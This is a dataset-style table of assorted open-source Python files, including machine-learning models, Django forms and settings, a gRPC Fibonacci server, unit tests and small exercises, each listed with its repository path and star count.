max_stars_repo_path
stringlengths 4
182
| max_stars_repo_name
stringlengths 6
116
| max_stars_count
int64 0
191k
| id
stringlengths 7
7
| content
stringlengths 100
10k
| size
int64 100
10k
|
---|---|---|---|---|---|
cellshape_voxel/autoencoder.py
|
DeVriesMatt/cellshape-voxel
| 1 |
2023411
|
from torch import nn
from .encoders.resnet import generate_model
from .encoders.convolutional import ConvolutionalEncoder
from .decoders.trans_convolutional import ConvolutionalDecoder
class AutoEncoder(nn.Module):
def __init__(
self,
num_layers_encoder=3,
num_layers_decoder=3,
encoder_type="simple",
input_shape=(64, 64, 64, 1),
filters=(32, 64, 128, 256, 512),
num_features=50,
bias=True,
activations=False,
batch_norm=True,
leaky=True,
neg_slope=0.01,
resnet_depth=10,
):
super(AutoEncoder, self).__init__()
assert (encoder_type == "simple") or (encoder_type == "resnet")
self.num_layers_encoder = num_layers_encoder
self.num_layers_decoder = num_layers_decoder
self.encoder_type = encoder_type
self.input_shape = input_shape
self.filters = filters
self.num_features = num_features
self.bias = bias
self.activations = activations
self.batch_norm = batch_norm
self.leaky = leaky
self.neg_slope = neg_slope
self.resnet_depth = resnet_depth
if encoder_type == "simple":
self.encoder = ConvolutionalEncoder(
num_layers_encoder,
input_shape,
filters,
num_features,
bias,
activations,
batch_norm,
leaky,
neg_slope,
)
else:
self.encoder = generate_model(resnet_depth)
self.decoder = ConvolutionalDecoder(
num_layers_decoder,
input_shape,
filters,
num_features,
bias,
activations,
batch_norm,
leaky,
neg_slope,
)
def forward(self, x):
features = self.encoder(x)
output = self.decoder(features)
return output, features
| 1,992 |
pymanopt/optimizers/steepest_descent.py
|
navigator8972/pymanopt
| 0 |
2023320
|
import time
from copy import deepcopy
import numpy as np
from pymanopt.optimizers.line_search import BackTrackingLineSearcher
from pymanopt.optimizers.optimizer import Optimizer, OptimizerResult
from pymanopt.tools import printer
class SteepestDescent(Optimizer):
"""Riemannian steepest descent algorithm.
Perform optimization using gradient descent with line search.
This method first computes the gradient of the objective, and then
optimizes by moving in the direction of steepest descent (which is the
opposite direction to the gradient).
Args:
line_searcher: The line search method.
"""
def __init__(self, line_searcher=None, *args, **kwargs):
super().__init__(*args, **kwargs)
if line_searcher is None:
self._line_searcher = BackTrackingLineSearcher()
else:
self._line_searcher = line_searcher
self.line_searcher = None
# Function to solve optimisation problem using steepest descent.
def run(
self, problem, *, initial_point=None, reuse_line_searcher=False
) -> OptimizerResult:
"""Run steepest descent algorithm.
Args:
problem: Pymanopt problem class instance exposing the cost function
and the manifold to optimize over.
The class must either
initial_point: Initial point on the manifold.
If no value is provided then a starting point will be randomly
generated.
reuse_line_searcher: Whether to reuse the previous line searcher.
Allows to use information from a previous call to
:meth:`solve`.
Returns:
Local minimum of the cost function, or the most recent iterate if
algorithm terminated before convergence.
"""
manifold = problem.manifold
objective = problem.cost
gradient = problem.riemannian_gradient
if not reuse_line_searcher or self.line_searcher is None:
self.line_searcher = deepcopy(self._line_searcher)
line_searcher = self.line_searcher
# If no starting point is specified, generate one at random.
if initial_point is None:
x = manifold.random_point()
else:
x = initial_point
if self._verbosity >= 1:
print("Optimizing...")
if self._verbosity >= 2:
iteration_format_length = int(np.log10(self._max_iterations)) + 1
column_printer = printer.ColumnPrinter(
columns=[
("Iteration", f"{iteration_format_length}d"),
("Cost", "+.16e"),
("Gradient norm", ".8e"),
]
)
else:
column_printer = printer.VoidPrinter()
column_printer.print_header()
self._initialize_log(
optimizer_parameters={"line_searcher": line_searcher}
)
# Initialize iteration counter and timer
iteration = 0
start_time = time.time()
while True:
iteration += 1
# Calculate new cost, grad and gradient_norm
cost = objective(x)
grad = gradient(x)
gradient_norm = manifold.norm(x, grad)
column_printer.print_row([iteration, cost, gradient_norm])
self._add_log_entry(
iteration=iteration,
point=x,
cost=cost,
gradient_norm=gradient_norm,
)
# Descent direction is minus the gradient
desc_dir = -grad
# Perform line-search
step_size, x = line_searcher.search(
objective, manifold, x, desc_dir, cost, -(gradient_norm**2)
)
stopping_criterion = self._check_stopping_criterion(
start_time=start_time,
step_size=step_size,
gradient_norm=gradient_norm,
iteration=iteration,
)
if stopping_criterion:
if self._verbosity >= 1:
print(stopping_criterion)
print("")
break
return self._return_result(
start_time=start_time,
point=x,
cost=objective(x),
iterations=iteration,
stopping_criterion=stopping_criterion,
cost_evaluations=iteration,
step_size=step_size,
gradient_norm=gradient_norm,
)
| 4,550 |
config.py
|
kirankumarsripati/full-stack-nd-0044-05-capstone
| 0 |
2022845
|
import os
# Grabs the folder where the script runs.
basedir = os.path.abspath(os.path.dirname(__file__))
ITEMS_PER_PAGE = 10
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL')
SQLALCHEMY_TEST_DATABASE_URI = os.environ.get('DATABASE_TEST_URL')
AUTH0_DOMAIN = 'dev-jv5b18wv.auth0.com'
ALGORITHMS = ['RS256']
API_AUDIENCE = 'FSND'
| 337 |
tools/win32_symbolize.py
|
fengjixuchui/bochspwn
| 138 |
2023382
|
#!/usr/bin/python
#
# Authors: <NAME> (<EMAIL>)
# <NAME> (<EMAIL>)
#
# Copyright 2013-2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import re
import subprocess
import sys
def main(argv):
if len(argv) < 3:
sys.stderr.write("Usage: %s <log file> <symbols directory>\n" % sys.argv[0])
sys.exit(1)
try:
f = open(argv[1], "r")
except IOError:
sys.stderr.write("Unable to open input file \"%s\"\n" % argv[1])
sys.exit(1)
symbols_path = sys.argv[2]
for line in f:
while True:
match = re.match("([a-zA-Z0-9]+\.[a-zA-Z]+)\+([0-9a-fA-F]+).*", line)
if match == None:
match = re.match(".*[^a-zA-Z0-9.]+([a-zA-Z0-9]+\.[a-zA-Z]+)\+([0-9a-fA-F]+).*", line)
if match == None:
break
image_name = match.group(1)
offset = match.group(2)
# Look up a corresponding pdb file
file_name, file_ext = os.path.splitext(image_name)
pdb_path = symbols_path + "/" + file_name + ".pdb"
if os.path.isfile(pdb_path) == False:
sys.stderr.write("PDB file \"%s\" for module \"%s\" not found\n" % (pdb_path, image_name))
break
p = subprocess.Popen([os.path.dirname(os.path.realpath(__file__)) + "\\win32_symbolize.exe", pdb_path, offset],
stdout = subprocess.PIPE, stderr = subprocess.PIPE)
stdout, stderr = p.communicate()
if p.returncode != 0:
sys.stderr.write("Native symbolizer failed with code %u: \"%s\"\n" % (p.returncode, stderr))
else:
line = line.replace("%s+%s" % (image_name, offset), "(%.8x) %s!%s" % (int(offset, 16), file_name, stdout.strip()))
break
# Display the final version of the line
print line.strip()
f.close()
if __name__ == "__main__":
main(sys.argv)
| 2,387 |
DjangoSignUP/MySignUpApp/views.py
|
RATHINAMOORTHY/Django_SignUp_Project
| 0 |
2022667
|
from django.shortcuts import render
from MySignUpApp import forms
from MySignUpApp import models
def index(request):
return render(request,'index.html')
# Create your views here.
def register(request):
form = forms.UsersModelForm
if request.method == 'POST':
form = forms.UsersModelForm(request.POST)
if form.is_valid():
form.save()
return index(request)
else:
print('Please try again')
return render(request,'register.html',{'form':form})
| 516 |
reversepair.py
|
W-YXN/MyNOIPProjects
| 0 |
2023185
|
def InversionNum(lst):
if len(lst) == 1:
return lst,0
else:
n = len(lst) // 2
lst1,count1 = InversionNum(lst[0:n])
lst2,count2 = InversionNum(lst[n:len(lst)])
lst,count = Count(lst1,lst2,0)
return lst,count1+count2+count
def Count(lst1,lst2,count):
i = 0
j = 0
res = []
while i < len(lst1) and j < len(lst2):
if lst1[i] <= lst2[j]:
res.append(lst1[i])
i += 1
else:
res.append(lst2[j])
count += len(lst1)-i
j += 1
res += lst1[i:]
res += lst2[j:]
return res,count
n = input()
n = int(n)
list1 = []
list1 = input().split()
list2 = []
i = 0
while i < n:
m = int(list1[i])
list2.append(m)
i += 1
anslst,ansnum = InversionNum(list2)
print ansnum
| 820 |
catalog/migrations/0004_auto_20200304_1405.py
|
CFarrant/MonstercatStreamingWebAppDjango
| 0 |
2023019
|
# Generated by Django 3.0.3 on 2020-03-04 21:05
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('catalog', '0003_auto_20200304_1358'),
]
operations = [
migrations.RenameField(
model_name='artist',
old_name='name',
new_name='artist_name',
),
migrations.AddField(
model_name='song',
name='album_id',
field=models.ForeignKey(default='EMPTY', on_delete=django.db.models.deletion.CASCADE, to='catalog.Album'),
),
migrations.AlterField(
model_name='song',
name='artist',
field=models.ForeignKey(default='EMPTY', on_delete=django.db.models.deletion.CASCADE, to='catalog.Artist'),
),
]
| 846 |
bommerge/components/test_capacitor.py
|
sakoPO/bommerge
| 0 |
2023611
|
import unittest
import capacitor
from decimal import *
class TestCapacitor(unittest.TestCase):
def test_conversion_str_to_decimal(self):
self.assertEqual(capacitor.convert_capacitance_co_farads('1fF'), Decimal('0.000000000000001'))
self.assertEqual(capacitor.convert_capacitance_co_farads('1pF'), Decimal('0.000000000001'))
self.assertEqual(capacitor.convert_capacitance_co_farads('1nF'), Decimal('0.000000001'))
self.assertEqual(capacitor.convert_capacitance_co_farads('100nF'), Decimal('0.0000001'))
self.assertEqual(capacitor.convert_capacitance_co_farads('1uF'), Decimal('0.000001'))
self.assertEqual(capacitor.convert_capacitance_co_farads('1mF'), Decimal('0.001'))
self.assertEqual(capacitor.convert_capacitance_co_farads('0'), 0)
self.assertEqual(capacitor.convert_capacitance_co_farads('1'), 1)
self.assertEqual(capacitor.convert_capacitance_co_farads('1fF1'), Decimal('0.0000000000000011'))
self.assertEqual(capacitor.convert_capacitance_co_farads('1pF1'), Decimal('0.0000000000011'))
self.assertEqual(capacitor.convert_capacitance_co_farads('1nF1'), Decimal('0.0000000011'))
self.assertEqual(capacitor.convert_capacitance_co_farads('1uF1'), Decimal('0.0000011'))
self.assertEqual(capacitor.convert_capacitance_co_farads('1mF1'), Decimal('0.0011'))
def test_conversion_decimal_to_str(self):
self.assertEqual(capacitor.farads_to_string(Decimal('0.0000000001')), '100pF')
self.assertEqual(capacitor.farads_to_string(Decimal('0.0000001')), '100nF')
self.assertEqual(capacitor.farads_to_string(Decimal('0.0001')), '100uF')
self.assertEqual(capacitor.farads_to_string(Decimal('0.1')), '100mF')
self.assertEqual(capacitor.farads_to_string(Decimal('1')), '1F')
self.assertEqual(capacitor.farads_to_string(Decimal('1000')), '1kF')
if __name__ == "__main__":
unittest.main()
| 1,960 |
src/python/arrayops.py
|
ketancmaheshwari/hello-goog
| 0 |
2023561
|
#!/bin/env python
import numpy as np
# controls printing array corners
# np.set_printoptions(threshold='nan')
zero = np.zeros(10)
one = np.ones(20)
print zero
print one
# read file into a numpy array
data = np.loadtxt('../data/strlist10k.txt', dtype='string')
print data
| 277 |
MMdyn.py
|
chris-price19/cell-mech-memory
| 1 |
2022705
|
#!/usr/bin/python
import math
import numpy as np
import scipy
from scipy.signal import argrelextrema, find_peaks
import scipy.ndimage as nd
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import numpy as np
import pandas as pd
import seaborn as sns
from pylab import cm
import os
import sys
import re
import sympy
import cmath
import matplotlib.patches as patches
from matplotlib import colors as m2colors
cwd = os.getcwd()
sns.set(style="ticks", font_scale=1.5)
mcolors = dict(m2colors.BASE_COLORS, **m2colors.CSS4_COLORS)
def static_alphaG(p,t):
return p['a0'] * np.exp(t/p['tau_SG'])
def static_alphaR(p,t):
return p['a0'] + (p['a_enter']-p['a0']) * np.exp(-t/p['tau_SR'])
def dyn_alphaG(p, t, dv):
tau_SGR = p['tau_SGR'] * np.exp(dv/p['TV0SG'])
return p['a0'] * np.exp(t/tau_SGR)
def dyn_alphaR(p, t, dv):
tau_SGR = p['tau_SGR'] * np.exp(dv/p['TV0SR'])
return p['a0'] + (p['a_enter']-p['a0']) * np.exp(-t/tau_SGR)
def plot_sample_dynamics(ax, t, a1, a2, params):
dt = t[1] - t[0]
ax.plot(t, a1, linewidth=3., color=mcolors['blue'], label='priming')
ax.plot(t + np.amax(t), a2, linewidth=3.,color=mcolors['blue'],label='memory')
xlims = ax.get_xlim()
ylims = ax.get_ylim()
w1 = t[a1 > params['a_c']][-1] - t[a1 > params['a_c']][0]
w2 = t[a2 > params['a_c']][-1] - t[a2 > params['a_c']][0]
# print(xlims)
# ax[1].legend(loc=1)
ax.plot([t[-1], t[-1]], [ylims[0], ylims[1]],
color = mcolors['black'], linewidth=3., linestyle='-.')
rect0 = patches.Rectangle((xlims[0], ylims[0]),
t[-1]-w1 + t[0]-xlims[0], ylims[1]-ylims[0],
color=mcolors['darkorange'], alpha=0.2)
rect1 = patches.Rectangle((t[-1] - w1, ylims[0]),
w1, ylims[1]-ylims[0],
color=mcolors['red'], alpha=0.2)
rect2 = patches.Rectangle((t[-1], ylims[0]),
w2,ylims[1]-ylims[0],
color=mcolors['springgreen'], alpha=0.2)
rect3 = patches.Rectangle((w2 + t[-1], ylims[0]),
t[-1] - w2 + xlims[1] - t[-1]*2, ylims[1]-ylims[0],
color=mcolors['darkviolet'], alpha=0.2)
ax.add_patch(rect0); ax.add_patch(rect1); ax.add_patch(rect2); ax.add_patch(rect3)
ax.plot(xlims,[params['a_c'], params['a_c']], color = mcolors['blue'], linestyle='-.', linewidth=2., label='\u03b1$_{c}$')
ax.set_xlim(xlims); ax.set_ylim(ylims)
return ax
def plotwrap(params, res, figdim):
t_space_long = np.linspace(0,240, res)
t_space_short = np.linspace(0, 120, res//2)
dv_space_short = np.linspace(0.001, 0.1, res//2)
dv_space_long = np.linspace(0.001, 0.4, res)
dt = t_space_long[1] - t_space_long[0]
alpha_static_g = static_alphaG(params, t_space_long)
params['a_enter'] = np.amax(alpha_static_g)
alpha_static_r = static_alphaR(params, t_space_long)
fig, ax = plt.subplots(2, 1, figsize=figdim)
ax[0].set_xlim([np.amin(t_space_long), np.amax(t_space_long)*2])
ax[1].set_xlim([np.amin(t_space_long), np.amax(t_space_long)*2])
ax[1] = plot_sample_dynamics(ax[1], t_space_long, alpha_static_g, alpha_static_r, params)
ax[0].set_xticks([])
ax[1].set_xlabel('t') # (hours)
ax[0].set_ylim(ax[1].get_ylim())
alpha_static_g = static_alphaG(params, t_space_short)
params['a_enter'] = np.amax(alpha_static_g)
alpha_static_r = static_alphaR(params, t_space_short)
tdiff = np.amax(t_space_long)*2 - np.amax(t_space_short) * 2
t_diff_space = np.arange(0.0, tdiff, t_space_short[1] - t_space_short[0])
params['a_enter'] = np.amin(alpha_static_r)
xtra = static_alphaR(params, t_diff_space)
ax[0] = plot_sample_dynamics(ax[0], t_space_short, alpha_static_g, alpha_static_r, params)
ax[0].plot(t_diff_space + np.amax(t_space_short)*2, xtra, linewidth=3.,color=mcolors['darkviolet'],linestyle = '--')
## dynamic
params['a_c'] = 1.5
alpha_dyn_g = dyn_alphaG(params, t_space_long, dv_space_long)
params['a_enter'] = np.amax(alpha_dyn_g)
alpha_dyn_r = dyn_alphaR(params, t_space_long, np.flip(dv_space_long))
fig2, ax2 = plt.subplots(2, 1, figsize=figdim)
ax2[0].set_xlim([np.amin(t_space_long), np.amax(t_space_long)*2])
ax2[1].set_xlim([np.amin(t_space_long), np.amax(t_space_long)*2])
ax2[1] = plot_sample_dynamics(ax2[1], t_space_long, alpha_dyn_g, alpha_dyn_r, params)
ax2[0].set_xticks([])
ax2[1].set_xlabel('t') # (hours)
ax2[0].set_ylim(ax2[1].get_ylim())
params['TV0SR'] = 0.06
alpha_dyn_g = alpha_dyn_g[:len(alpha_dyn_g)//2] # dyn_alphaG(params, t_space, dv_space)
params['a_enter'] = np.amax(alpha_dyn_g)
alpha_dyn_r = dyn_alphaR(params, t_space_short, np.flip(dv_space_short))
tdiff = np.amax(t_space_long)*2 - np.amax(t_space_short) * 2
t_diff_space = np.arange(0.0, tdiff, t_space_short[1] - t_space_short[0])
params['a_enter'] = np.amin(alpha_dyn_r)
xtra = dyn_alphaR(params, t_diff_space, dv_space_short[0])
ax2[0] = plot_sample_dynamics(ax2[0], t_space_short, alpha_dyn_g, alpha_dyn_r, params)
ax2[0].plot(t_diff_space + np.amax(t_space_short)*2, xtra, linewidth=3.,color=mcolors['darkviolet'],linestyle = '--')
def format_tick_labels(x, pos):
return '{0:.1f}'.format(x)
ax[0].yaxis.set_major_formatter(ticker.FuncFormatter(format_tick_labels))
ax[1].yaxis.set_major_formatter(ticker.FuncFormatter(format_tick_labels))
ax2[0].yaxis.set_major_formatter(ticker.FuncFormatter(format_tick_labels))
ax2[1].yaxis.set_major_formatter(ticker.FuncFormatter(format_tick_labels))
fig.tight_layout()
fig2.tight_layout()
return fig, fig2, ax, ax2
| 5,826 |
ambition_utils/forms.py
|
thinkt4nk/ambition-utils
| 0 |
2023710
|
from copy import deepcopy
from django.core.exceptions import ValidationError
from django.db.transaction import atomic
from django.forms.utils import ErrorDict
class NestedFormConfig(object):
"""
Defines how a nested form is handled in the context of another form. Any form class using a subclass of
NestedFormMixinBase can define a nested_form_configs list with instances of NestedFormConfig
"""
def __init__(self, cls, key, required=False, field_prefix=None, required_key=None, pre=False, post=False):
"""
Sets all default values
:param cls: Any form class reference
:param key: The dict key that will be used when passing around form arguments during processing.
The value of this dict will be the return value of the save method
:type key: str
:param required: Determines if this form's fields are always required
:type required: bool
:param field_prefix: Optional field for when multiple instance of the same form are nested. This allows
the submitted data to have a prefix before each form field name.
:type field_prefix: str
:param required_key: Optional form field that causes the form to be required based on its presence.
:type required_key: bool
:param pre: Flag to indicate that the nested form should be processed before the parent form save method. This
allows the nested form's save value to be available in the save method arguments keyed off of the key param.
:type pre: bool
:param post: Flag to indicate that the nested form should be processed after the parent form save method. This
allows the parent form's save value to be available in the post save method arguments.
:type post: bool
"""
self.cls = cls
self.key = key
self.required = required
self.field_prefix = field_prefix
self.required_key = required_key
self.pre = pre
self.post = post
self.instance = None
assert self.cls
assert self.key
def set_instance(self, *args, **kwargs):
self.instance = self.cls(*args, **kwargs)
class NestedFormMixinBase(object):
"""
Allows a form to contain multiple and optional nested forms. The form configurations are defined in
nested_form_configs and is defined by instances of NestedFormConfig
"""
nested_form_configs = []
def __init__(self, *args, **kwargs):
super(NestedFormMixinBase, self).__init__(*args, **kwargs)
# Build a list of all nest form configs
self.nested_forms = []
# Keep track of form prefixes to guarantee multiple of the same form are properly prefixed
form_prefixes = {}
for nested_form_config in self.nested_form_configs:
# Deep copy the form kwargs to pass to each form instance
form_kwargs = deepcopy(kwargs)
prefix = nested_form_config.field_prefix
# Check if this form class already exists
if nested_form_config.cls in form_prefixes:
# Make sure both have a prefix value
if not form_prefixes[nested_form_config.cls] or not nested_form_config.field_prefix:
raise ValidationError(
'Form {0} must have a field prefix'.format(nested_form_config.cls.__name__)
)
# Set the prefix value to the form config prefix
form_prefixes[nested_form_config.cls] = nested_form_config.field_prefix
# Process the form field keys when there is a prefix defined on the nested form
if form_kwargs.get('data') and prefix:
for prefixed_key, value in deepcopy(form_kwargs['data']).items():
# Check if the prefix is there to replace
to_replace = '{0}_'.format(prefix)
if prefixed_key.startswith(to_replace):
# Replace the prefix
key = prefixed_key.replace(to_replace, '')
form_kwargs['data'][key] = value
# Get rid of the prefixed key
form_kwargs['data'].pop(prefixed_key)
# Create the form instance and pass the form data
nested_form_config.set_instance(*args, **form_kwargs)
# Add the form config to the list of nested form configs
self.nested_forms.append(nested_form_config)
def get_pre_save_method_kwargs(self): # pragma: no cover
"""
Optionally return a dict of data that will be passed through the chain of save methods with
pre-forms, parent form, and post-forms
"""
return {}
def get_post_save_method_kwargs(self, **kwargs): # pragma: no cover
"""
Optionally return a dict of data that will be passed to the post-forms. All previous form data will be
available here including pre-save data and parent form save data.
"""
return kwargs
def get_required_forms(self):
"""
Checks which forms are required based on the params and returns a list of only the required forms
:rtype: list of NestedFormConfig
"""
return [nested_form for nested_form in self.nested_forms if self.form_is_required(nested_form)]
def save_form(self, **kwargs):
"""
Hook for the parent form to save an object so that it doesn't override the mixin's save method and logic.
"""
return None
def form_is_required(self, nested_form):
"""
Handles the logic to check if an individual form is required
"""
if nested_form.required:
return True
# Get the required flag value
return self.cleaned_data.get(nested_form.required_key)
def full_clean(self):
"""
Cleans all of self.data and populates self._errors and
self.cleaned_data.
This is copied from django with an addition at the bottom
"""
# This is the django code
self._errors = ErrorDict()
if not self.is_bound: # pragma: no cover
return
self.cleaned_data = {}
if self.empty_permitted and not self.has_changed(): # pragma: no cover
return
self._clean_fields()
self._clean_form()
self._post_clean()
# This is the additional code that updates the form's errors with the nested form's errors
required_forms = self.get_required_forms()
for form in required_forms:
self._errors.update(form.instance.errors)
class NestedFormMixin(NestedFormMixinBase):
@atomic
def save(self, *args, **kwargs):
"""
Handles getting additional arguments, calling save on pre-save forms, calling save_form on the parent form,
and calling save on post-save forms. The form kwargs are passed through the whole chain and the parent
form's save_form return value is returned from this method.
"""
# Get any additional arguments that should be passed to the save methods
form_kwargs = self.get_pre_save_method_kwargs()
# Get all required nested forms
required_forms = self.get_required_forms()
# Save all pre-save forms
for form in required_forms:
if form.pre:
# Store the return value keyed off the form.key property
form_kwargs[form.key] = form.instance.save(**form_kwargs)
# Save the parent form
form_kwargs['form_save'] = self.save_form(**form_kwargs)
# Get any additional post-save arguments
form_kwargs = self.get_post_save_method_kwargs(**form_kwargs)
# Save all post-save forms
for form in required_forms:
if form.post:
# Store the return value keyed off the form.key property
form_kwargs[form.key] = form.instance.save(**form_kwargs)
# Return the value from the parent form's save_form method
return form_kwargs['form_save']
class NestedModelFormMixin(NestedFormMixinBase):
@atomic
def save(self, commit=True):
"""
Handles getting additional arguments, calling save on pre-save forms, calling save on the parent model form,
and calling save on post-save forms. The form kwargs are passed through the whole chain and the parent
form's save return value is returned from this method.
"""
# Get any additional arguments that should be passed to the save methods
form_kwargs = self.get_pre_save_method_kwargs()
# Get all required nested forms
required_forms = self.get_required_forms()
# Save all pre-save forms
for form in required_forms:
if form.pre:
# Store the return value keyed off the form.key property
form_kwargs[form.key] = form.instance.save(**form_kwargs)
# Save the parent form
form_kwargs['instance'] = super(NestedModelFormMixin, self).save(commit=commit)
# Get any additional post-save arguments
form_kwargs = self.get_post_save_method_kwargs(**form_kwargs)
# Save all post-save forms
for form in required_forms:
if form.post:
# Store the return value keyed off the form.key property
form_kwargs[form.key] = form.instance.save(**form_kwargs)
# Return the value from the parent form's save method
return form_kwargs['instance']
| 9,587 |
config/settings/local.py
|
ayobuba/Modern-Django
| 0 |
2023195
|
from .base import *
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env('DJANGO_SECRET_KEY',default='<KEY>')
DEBUG = env.bool('DJANGO_DEBUG',True)
| 179 |
Python/Serie Temporal Decomposição.py
|
filipeaguiarrod/Formacao-Cientista-de-Dados-com-Python-e-R
| 0 |
2023513
|
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 8 18:14:36 2020
@author: rodri
"""
import pandas as pd
import numpy as np
import matplotlib.pylab as plt
from statsmodels.tsa.seasonal import seasonal_decompose
base = pd.read_csv('AirPassengers.csv')
dateparse = lambda dates: pd.datetime.strptime(dates,'%Y-%m') # transformar objeto em data (ano-mes)
base = pd.read_csv('AirPassengers.csv', parse_dates = ['Month'], index_col='Month', date_parser = dateparse) # index_col - index vira data
#index vira data importante para série temporal.
ts=base['#Passengers'] # Saudavel transformar o tipo "dataframe" como series
plt.plot(ts)
decomposicao = seasonal_decompose(ts) # decompõe a série temporal
tendencia = decomposicao.trend #variavel que obtem a tendencia (trend)
plt.plot(tendencia)
sazonal = decomposicao.seasonal
plt.plot(sazonal)
aleatorio = decomposicao.resid # o que sobrou da tendencia e sazonal
plt.plot(aleatorio)
# subplot(4(linhas que vou utilizarpara visualizar, 1 colunas de visualização, 1 ID posso juntar tudo com mesmo ID )
plt.subplot(4,1,2) # cria um ID se eu deixar o mesmo sobreescreve
plt.plot(ts, label='Original')
plt.legend(loc='best')
plt.subplot(4,1,2)
plt.plot(tendencia, label='Tendência')
plt.legend(loc='best')
plt.subplot(4,1,3)
plt.plot(sazonal, label='Sazonalidade')
plt.legend(loc='best')
plt.subplot(4,1,4)
plt.plot(aleatorio, label='Aleatório')
plt.legend(loc='best')
plt.tight_layout() # Ajustar layout para nao comer legenda
| 1,476 |
BaseKnowledge/date/date.py
|
Kose-i/python_test
| 0 |
2022913
|
#! /usr/bin/env python3
import datetime
def func1():
tmp_time = datetime.datetime(1000, 1, 1, 0, 0, 0)
print(tmp_time)
now_time = datetime.datetime.now()
list = (now_time.year, now_time.month, now_time.day, now_time.hour, now_time.minute, now_time.second, now_time.microsecond)
print(list)
print("now_time - tmp_time=", now_time - tmp_time)
if __name__=='__main__':
print("\nfunc1()")
func1()
| 412 |
yggdrasil/drivers/LPyModelDriver.py
|
Xyzic/yggdrasil
| 0 |
2023517
|
import os
from yggdrasil.languages import get_language_dir
from yggdrasil.drivers.PythonModelDriver import PythonModelDriver
_model_script = os.path.join(get_language_dir('lpy'), 'lpy_model.py')
class LPyModelDriver(PythonModelDriver): # pragma: lpy
r"""Class for running LPy models."""
_schema_subtype_description = ('Model is an LPy system.')
executable_type = 'dsl'
language = 'lpy'
language_ext = '.lpy'
# base_languages = ['python'] # Uncomment if PythonModelDriver not parent
default_interpreter_flags = [_model_script]
interface_dependencies = ['openalea.lpy']
function_param = None
full_language = False
is_dsl = True
@classmethod
def language_version(cls, **kwargs):
r"""Determine the version of this language.
Args:
**kwargs: Keyword arguments are passed to cls.run_executable.
Returns:
str: Version of compiler/interpreter for this language.
"""
try:
import openalea.lpy
return openalea.lpy.__version__.LPY_VERSION_STR
except ImportError: # pragma: debug
raise RuntimeError("openalea.lpy not installed.")
| 1,188 |
example_package/cli.py
|
Adoni5/example_package
| 0 |
2023723
|
"""Console script for example_package."""
import argparse
import sys
from example_package import example_package as E
def main():
"""Console script for example_package."""
parser = argparse.ArgumentParser()
parser.add_argument("nums", nargs="+", type=int)
args = parser.parse_args()
for n in args.nums:
print(E.prime(n), file=sys.stdout)
return 0
if __name__ == "__main__":
sys.exit(main()) # pragma: no cover
| 453 |
Own/Python/Tutorials/Loops.py
|
cychitivav/programming_exercises
| 0 |
2023706
|
#<NAME>
#<EMAIL>
#12/Sept/2018
index = 0
while index <= 10:
print(index)
if index == 7:
index += 2
continue #Continue or break
else:
index += 1
else:
print("Finish")
#For
myList = [2, 4, 6, 8, 10]
for value in myList:
print(value)
myList = range(1, 11)
for value in range(0, 20, 3):
print(value)
for value in range(0, len(myList)):
print(value)
for index, value in enumerate(myList):
print(value, ", index:", index)
| 511 |
src/fibonacci/gRPC/server.py
|
KaoWYK/IoT_Comm_Design_Fibo
| 0 |
2022814
|
import os
import os.path as osp
import sys
BUILD_DIR = osp.join(osp.dirname(osp.abspath(__file__)), "build/service/")
sys.path.insert(0, BUILD_DIR)
import argparse
import grpc
from concurrent import futures
import fib_pb2
import fib_pb2_grpc
class FibCalculatorServicer(fib_pb2_grpc.FibCalculatorServicer):
def __init__(self):
pass
def Compute(self, request, context):
n = request.order
value = self._fibonacci(n)
response = fib_pb2.FibResponse()
response.value = value
print("Received: ", n, " Return: ", response)
return response
def _fibonacci(self, n):
a = 0
b = 1
if n < 0:
return 0
elif n == 0:
return 0
elif n == 1:
return b
else:
for i in range(1, n):
c = a + b
a = b
b = c
return b
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--ip", default="0.0.0.0", type=str)
parser.add_argument("--port", default=8080, type=int)
args = vars(parser.parse_args())
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
servicer = FibCalculatorServicer()
fib_pb2_grpc.add_FibCalculatorServicer_to_server(servicer, server)
try:
server.add_insecure_port(f"{args['ip']}:{args['port']}")
server.start()
print(f"Run gRPC Server for Fibonacci Calculation at {args['ip']}:{args['port']}")
server.wait_for_termination()
except KeyboardInterrupt:
pass
| 1,598 |
07/solution1.py
|
k0mmsussert0d/aoc2020
| 0 |
2023373
|
import re
d = {}
def process_line(line):
g = re.search(r'^(.+) bags contain (.+).$', line)
parent = g.group(1)
if g.group(2) == 'no other bags':
children = {}
else:
children = {
typ: int(count) for count, typ in
[re.search(r'^(\d) (.+)$', j).groups() for j in
[i.replace('bags', '').replace('bag', '').replace('.', '').strip() for i in g.group(2).split(',')]]
}
d[parent] = children
def bags_containing_x(x):
res = set()
for bag_name, bags in d.items():
if x in bags:
res.add(bag_name)
res |= bags_containing_x(bag_name)
return res
if __name__ == '__main__':
with open('input1', 'r') as file:
f = file.readlines()
[process_line(l) for l in f]
print(len(bags_containing_x('shiny gold')))
| 847 |
graviteeio_cli/commands/apim/apis/start.py
|
gravitee-io/gravitee-cli
| 12 |
2023557
|
import click
from graviteeio_cli.http_client.apim.api import ApiClient
from ....exeptions import GraviteeioError
@click.command()
@click.option('--api', 'api_id',
help='API id',
required=True)
@click.pass_obj
def start(obj, api_id):
"""Starts an API."""
api_client: ApiClient = obj['api_client']
try:
api_client.start(api_id)
click.echo(f"API [{api_id}] is started.")
except GraviteeioError:
raise GraviteeioError(f"API [{api_id}] could not be started.")
| 526 |
tests/testmanually_entity.py
|
LegitStack/blink
| 0 |
2023711
|
import sys, os
sys.path.append(os.getcwd()) # run from blink/
from node import Entity
from message_board import MSGBoard
import time
def create_basic_entity():
def print_test():
return 'hello_world'
return Entity({
'print_test': (print_test, ((),)),
'print': (print, ('print_test',)),
})
def test_listen():
board = MSGBoard('board')
a = create_basic_entity()
b = create_basic_entity()
b.listen(board)
a.say('print_test', board)
print(board.messages)
time.sleep(2)
a.say('print', board)
